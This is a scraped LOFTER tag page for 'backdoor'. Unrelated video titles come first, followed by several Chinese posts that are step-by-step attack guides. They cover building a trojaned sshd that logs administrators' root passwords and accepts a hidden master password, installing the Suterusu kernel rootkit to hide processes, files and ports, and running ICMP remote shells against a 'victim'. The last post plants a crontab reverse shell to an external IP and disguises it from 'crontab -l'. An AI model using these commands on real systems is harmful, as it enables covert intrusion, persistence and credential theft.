LOFTER for ipad —— 让兴趣,更有趣

点击下载 关闭

后门

2869浏览    50参与
大熊小剧场
当班主任在后门偷看时!
当班主任在后门偷看时!
玩具开箱君
拆美捷轮车模盲盒,绿色的大众高尔夫后门可开
拆美捷轮车模盲盒,绿色的大众高尔夫后门可开
小翔爱游戏
595和平精英:堵住集装箱后门,偷走“翻车的特斯拉
595和平精英:堵住集装箱后门,偷走“翻车的特斯拉
游戏解说熊
迷你世界 被压在五指山的孙悟空,原来有后门
迷你世界 被压在五指山的孙悟空,原来有后门
小强游戏解说
明日之后:抄家不用从正门进?后门也是可以进入的,不走寻常路
明日之后:抄家不用从正门进?后门也是可以进入的,不走寻常路
坤坤小表弟
迷你世界:我们找到仓库打开后门拯救小人国
迷你世界:我们找到仓库打开后门拯救小人国
坤坤小表弟
迷你世界:你们知道后门的密码是多少吗
迷你世界:你们知道后门的密码是多少吗
小函闯世界
植物大战僵尸2:植物结霜导致后门被偷
植物大战僵尸2:植物结霜导致后门被偷
追梦小温
迷你世界:小温被假酋长困在家里能找到家里的钥匙从后门逃跑吗
迷你世界:小温被假酋长困在家里能找到家里的钥匙从后门逃跑吗
阿澈情报网
狮子捕杀疣猪,疣猪却从“后门”逃跑,这时角马送上门来
狮子捕杀疣猪,疣猪却从“后门”逃跑,这时角马送上门来
头号科普
厚颜无耻的鱼,居然会“隐身”总喜欢走海参的后门
厚颜无耻的鱼,居然会“隐身”总喜欢走海参的后门
二狗子玩游戏
迷你世界04:我到兄弟家要羊肉,开他家后门看见1只怪物
迷你世界04:我到兄弟家要羊肉,开他家后门看见1只怪物
二狗子玩游戏
迷你世界139:我在兄弟家后门做陷阱,怪物进屋被抓住
迷你世界139:我在兄弟家后门做陷阱,怪物进屋被抓住
吃喝重庆
沙坪坝一中后门开了15年的鸡杂米线
沙坪坝一中后门开了15年的鸡杂米线
z0nek

SSH后门获取root密码linux工具附带源码

1.解压sshdwan.tgz

tar zxvf sshdwan.tgz

2.cd 到解压的目录

cd sshdwan/

3.打开文件修改你的后门密码在文件最尾处查找

vi includes.h

#define ILOG "/var/log/ilog" //这里表示本地登陆获取ssh密码保存的位置可修改

#define OLOG "/var/log/olog" //这里表示远程登陆获取ssh密码保存的位置可修改

#define SECRETPW "qweqwe$123&...

1.解压sshdwan.tgz

tar zxvf sshdwan.tgz

2.cd 到解压的目录

cd sshdwan/

3.打开文件修改你的后门密码在文件最尾处查找

vi includes.h

#define ILOG "/var/log/ilog" //这里表示本地登陆获取ssh密码保存的位置可修改

#define OLOG "/var/log/olog" //这里表示远程登陆获取ssh密码保存的位置可修改

#define SECRETPW "qweqwe$123" //这里是你后门的密码可修改

4.配置ssh

./configure --prefix=/usr --sysconfdir=/etc/ssh

5.进行编译和安装

make clean && make && make install

6.重启ssh

sudo /etc/init.d/sshd restart && sudo /etc/init.d/ssh restart

7.操作完成后等于ssh就有2个root密码你自己一个root密码,管理员一个root密码。等到管理登陆后,

你还可以获取到他的密码。要是管理员有登陆别的linux主机还可以获取其它主机密码

获得更多linux主机最隐藏的后门工具。你现在可以登陆安装好后门的ssh尝试吧.

链接: https://pan.baidu.com/s/1gfQwUYJ 密码: 8cyx

Astranger-个人博客-专注于web渗透研究
z0nek

内核级rootkit Suterusu的安装与使用

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root

$ ./sock 0

Hide PID

$ ./sock 1[pid]

Unhide PID

$ ./sock 2[pid]

HideTCPv4 port

$ ./sock 3[port]

UnhideTCPv4 port

$ ./sock 4[port]

HideTCPv6 port

$ ...

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root

$ ./sock 0

Hide PID

$ ./sock 1[pid]

Unhide PID

$ ./sock 2[pid]

HideTCPv4 port

$ ./sock 3[port]

UnhideTCPv4 port

$ ./sock 4[port]

HideTCPv6 port

$ ./sock 5[port]

UnhideTCPv6 port

$ ./sock 6[port]

HideUDPv4 port

$ ./sock 7[port]

UnhideUDPv4 port

$ ./sock 8[port]

HideUDPv6 port

$ ./sock 9[port]

UnhideUDPv6 port

$ ./sock 10[port]

Hide file/directory

$ ./sock 11[name]

Unhide file/directory

$ ./sock 12[name]

在CentOS6.5 64位下测试:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64

make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules

make[1]:Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

CC [M] /tmp/suterusu-master/main.o

CC [M] /tmp/suterusu-master/util.o

CC [M] /tmp/suterusu-master/module.o

LD [M] /tmp/suterusu-master/suterusu.o

Building modules, stage 2.

MODPOST 1 modules

CC /tmp/suterusu-master/suterusu.mod.o

LD [M] /tmp/suterusu-master/suterusu.ko.unsigned

NO SIGN [M] /tmp/suterusu-master/suterusu.ko

make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock

sock.c:在函数‘main’中:

sock.c:205:警告:隐式声明与内建函数‘strlen’不兼容

sock.c:220:警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]#./sock 15542Hiding PID 5542

隐藏文件:
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏

[root@vincent suterusu-master]#./sock 11image.phpHiding file/dir ../image.php

隐藏连接:

[root@vincent suterusu-master]# netstat -ano | grep 49745

tcp 000.0.0.0:497450.0.0.0:* LISTEN off (0.00/0/0)

[root@vincent suterusu-master]#./sock 349745HidingTCPv4 port 49745

[root@vincent suterusu-master]# netstat -ano | grep 49745

[root@vincent suterusu-master]#


z0nek

Linux下的icmp shell后门

下载地址:
http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz
需要注意两点:
1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.
客户端和服务端需要用socket通信,需要用root权限
2.) When configuring the options for the server/client make sure the following...

下载地址:
http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz
需要注意两点:
1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.
客户端和服务端需要用socket通信,需要用root权限
2.) When configuring the options for the server/client make sure the following options are the same on both the client and the server:

-i <id>
-p <packetsize>

[root@server120 ISHELL-v0.2]# make linux

被控端:
[root@vincent ISHELL-v0.2]# ./ishd -i 65535 -t 0 -p 1024
控制端:
[root@vincenthostname ISHELL-v0.2]# ./ish -i 65535 -t 0 -p 1024 172.16.100.134

ICMP Shell v0.2 (client) – by: Peter Kieltyka
————————————————–

Connecting to 172.16.100.134…done.

# whoami
root

参考文章:
http://icmpshell.sourceforge.net/

z0nek

使用icmp协议反弹shell

程序:https://github.com/inquisb/icmpsh#usage
在一些访问控制做的比较严格的环境中,由内到外的TCP流量会被阻断掉,文章主要讨论icmp shell的使用
特点:
1)开源程序
2)基于CS架构
3)服务端程序跨平台,支持C、perl、python
4)客户端仅支持Windows
5)不需要管理员权限

服务端需要先安装python包

[root@server120 icmpsh-master]# pip install Impacket

[root@server120 icmpsh-master]#./run.sh

#######################...

程序:https://github.com/inquisb/icmpsh#usage
在一些访问控制做的比较严格的环境中,由内到外的TCP流量会被阻断掉,文章主要讨论icmp shell的使用
特点:
1)开源程序
2)基于CS架构
3)服务端程序跨平台,支持C、perl、python
4)客户端仅支持Windows
5)不需要管理员权限

服务端需要先安装python包

[root@server120 icmpsh-master]# pip install Impacket

[root@server120 icmpsh-master]#./run.sh

####################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

####################################################

-------------------------------------------------------------------

[?]Whatis the victims public IP address?

-------------------------------------------------------------------

192.168.192.122

[-]Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120-d 500-b 30-s 128

++++++++++++++++++++++++++++++++++++++++++++

[-]Local ICMP Replies are currently enabled, I will disable these temporarily now

[-]LaunchingListener...,waiting for a inbound connection..D:\>whoamiwhoamiwin-a94sbnf0i6b\administrator

 

客户端:
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128


z0nek

利用crontab实现无文件兼容性强的反弹后门

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username
(crontab -l;echo ‘*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i’)|crontab –

升级猥琐版
(crontab -l;printf “* * * ...

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username
(crontab -l;echo ‘*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i’)|crontab –

升级猥琐版
(crontab -l;printf “* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i;\rno crontab for `whoami`%100c\n”)|crontab –
crontab -l 直接提示no crontab for $username
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

转自:http://zone.wooyun.org/content/18244


LOFTER

让兴趣,更有趣

简单随性的记录
丰富多彩的内容
让生活更加充实

下载移动端
关注最新消息